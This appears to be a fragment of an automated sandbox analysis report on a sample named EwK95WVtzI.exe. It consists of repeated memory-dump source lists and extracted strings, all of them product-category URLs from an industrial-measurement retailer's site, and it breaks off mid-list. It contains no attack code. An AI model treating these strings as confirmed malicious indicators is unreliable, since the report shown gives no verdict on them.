00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-skenerji
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-telefoni
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/fiksni-infrardeci-ir-merilniki-tempe
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/kalibracijska-oprema-crno-telo-black
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/merilni-sistemi-za-temperaturo-calex
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/prikazovalniki-in-regulatorji-calex/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/prikazovalniki-za-fiksne-infrardece-
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/rocni-infrardeci-ir-merilniki-temper
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/izolirane-zice-termoparov/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/kabli-prikljucni-za-uporovna-tipala
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/kabli-termoclenov-za-termoelemente-
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/konektorji-za-prikljucitev-temperat
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/podaljski-za-termoclene-termoelemen
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 